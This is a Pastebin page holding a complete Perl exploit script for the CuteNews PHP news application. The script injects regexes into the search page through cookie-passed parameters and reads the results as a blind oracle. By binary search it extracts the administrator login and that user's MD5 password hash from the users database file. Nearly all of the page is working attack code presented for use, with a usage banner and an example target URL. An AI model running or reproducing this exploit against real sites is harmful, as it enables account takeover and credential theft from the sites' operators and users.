Advertisement
Guest User

31337 sploet

a guest
Oct 13th, 2013
163
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 4.27 KB | None
  1. #!/usr/bin/perl
  2. &usage unless $ARGV[0];
  3.  
  4. use strict;
  5. use LWP;
  6. use utf8;
  7. use Encode qw( decode );
  8.  
  9. $| = 1;
  10.  
  11.  
  12.  
  13. # main
  14. my $search_page_url = URI->new($ARGV[0]);
  15. my $user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36';    # common user agent string
  16. my ($login, $md5hash);
  17. $search_page_url->query_form([  'dosearch' => 'yes',
  18.                                 'user' => '1',
  19.                                 ]
  20.                             );
  21.  
  22.  
  23.  
  24.  
  25.  
  26. # try the 'admin' login
  27. print STDERR "[Getting login]\n";
  28. {
  29.     print STDERR "Checking if there exists account named 'admin'... ";
  30.  
  31.     if (&login('^admin$')){
  32.         $login = 'admin';
  33.         print STDERR 'yes!';
  34.     } else {
  35.         print STDERR 'no.';
  36.     }; 
  37.     print STDERR "\n";
  38. }
  39.  
  40.  
  41. # bruteforce [a-zA-Z0-9] login if not 'admin'
  42. unless ($login){
  43.     print STDERR 'Finding login... ';
  44.  
  45.     my $tmp = '';
  46.     # check if login length is in 1-64
  47.     die "\n", 'Can\'t find suitable account.' unless &login('^[a-zA-Z0-9]{1,64}$');
  48.  
  49.     until( &login("\^${tmp}\$")) {
  50.         $tmp .= &binary_search($tmp, 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789', \&login);
  51.         print STDERR "\rFinding login... $tmp";
  52.     }
  53.     print STDERR "\n";
  54.     $login = $tmp;
  55. }
  56. die '...' unless $login;
  57.  
  58.  
  59.  
  60.  
  61.  
  62. # bruteforce md5 hash
  63. print STDERR "\n[Getting password hash]\n";
  64. {
  65.     my $tmp = '';
  66.  
  67.     while( length($tmp) != 32) {
  68.         $tmp .= &binary_search($tmp, 'abcdef0123456789', \&password);
  69.         print STDERR "\r$tmp";
  70.     }
  71.     print STDERR "\n";
  72.     $md5hash = $tmp;
  73. }
  74. die "..." unless $md5hash;
  75.  
  76.  
  77.  
  78. print STDERR "\n[Output]\n";
  79. print "$login:$md5hash\n";
  80. exit;
  81.  
  82.  
  83.  
  84.  
  85.  
  86. # can be upgraded to turn strings like abcdef into [a-f]
  87. sub binary_search{
  88.     my ($part, $symbols, $req) = @_;
  89.  
  90.     print STDERR substr($symbols, int(length($symbols)/2), 1);
  91.  
  92.     while (length($symbols) != 1){
  93.         my $tmp = substr($symbols, 0, int(length($symbols)/2));
  94.         if ($req->("^${part}[$tmp]")){
  95.             $symbols = $tmp;
  96.         } else {
  97.             $symbols = substr($symbols, int(length($symbols)/2));
  98.         }
  99.     print STDERR "\b", substr($symbols, int(length($symbols)/2), 1);
  100.     }
  101.     return $symbols;
  102. }
  103.  
  104.  
  105.  
  106. sub password{   # apply regex from $_[0] to $login's md5-hash and parse response
  107.     my $url = $search_page_url->clone;
  108.     $url->query_form(   ($url->query_form,
  109.                         'files_arch[]' => 'data/users.db.php',
  110.                         'title' => $login,
  111.                         'story' => "(?=^[a-z0-9]{32}\$)$_[0]",  # (?=..) to match only vs hash, not nickname. check app source code
  112.                                                                 #if(@preg_match("/$story/i", *nickname*) or @preg_match("/$story/i", *hash*)
  113.                         )
  114.                     ); 
  115.  
  116.     my $response = &do_REQ($url);
  117.    
  118.     return &parse_response($response); 
  119. }
  120.  
  121.  
  122.  
  123. sub login{  # apply regex from $_[0] to login and parse response
  124.     my $url = $search_page_url->clone;
  125.     $url->query_form(   ($url->query_form,
  126.                         'files_arch[]' => 'data/users.db.php',
  127.                         'title' => $_[0],
  128.                         )
  129.                     ); 
  130.  
  131.     my $response = &do_REQ($url);
  132.    
  133.     return &parse_response($response); 
  134. }
  135.  
  136.  
  137.  
  138. sub usage{
  139.     print STDERR '      _   _ _______        ______  
  140.  ___| \ | | ____\ \      / / ___|
  141. / __|  \| |  _|  \ \ /\ / /\___ \
  142. | (__| |\  | |___  \ V  V /  ___) |
  143. \___|_| \_|_____|  \_/\_/  |____/
  144.  ___ ____   __  
  145. / _ \___ \ / /_  
  146. | | | |__) | \'_ \
  147. | |_| / __/| (_) |
  148. \___/_____|\___/
  149.  
  150. This program exploits vulnerability in CuteNews php script and gives you administrator login and md5-hashed password.
  151.  
  152. Note: you can redirect stdout to file to get credentials in form login:hash. Stderr will be used for status updates.
  153.  
  154. Example of usage:
  155.     perl ', $0, ' http://rdot.org/cnews/search.php >creds.txt';
  156.  
  157.     exit;
  158. }
  159.  
  160.  
  161.  
  162. sub parse_response{
  163.     my $response = decode('cp1251', $_[0]);
  164.  
  165.     die "Can't parse response!" unless $response =~ m{Найдено <b>\[(\d+)\]</b> статей:};
  166.  
  167.     return $1;
  168. }
  169.  
  170.  
  171.  
  172. my $browser;
  173. sub do_REQ {
  174.     unless ($browser){
  175.         $browser = LWP::UserAgent->new(('agent' => $user_agent));
  176.         $browser->timeout(30);
  177.     }
  178.     # since rg==on always, turn all GET params 2 COOKIE
  179.     my $url = URI->new($_[0]);
  180.     my $params = $url->query();
  181.     $params =~ s/&/; /g;
  182.  
  183.     $url->query_form('');
  184.     my $resp = $browser->get($url, ('Cookie' => $params));
  185.  
  186.     die "Failed making request" unless $resp->is_success;
  187.  
  188.     return ($resp->content, $resp->status_line, $resp->is_success)
  189.         if wantarray;
  190.  
  191.     return unless $resp->is_success;
  192.     return $resp->content;
  193. }
Advertisement
RAW Paste Data Copied
Advertisement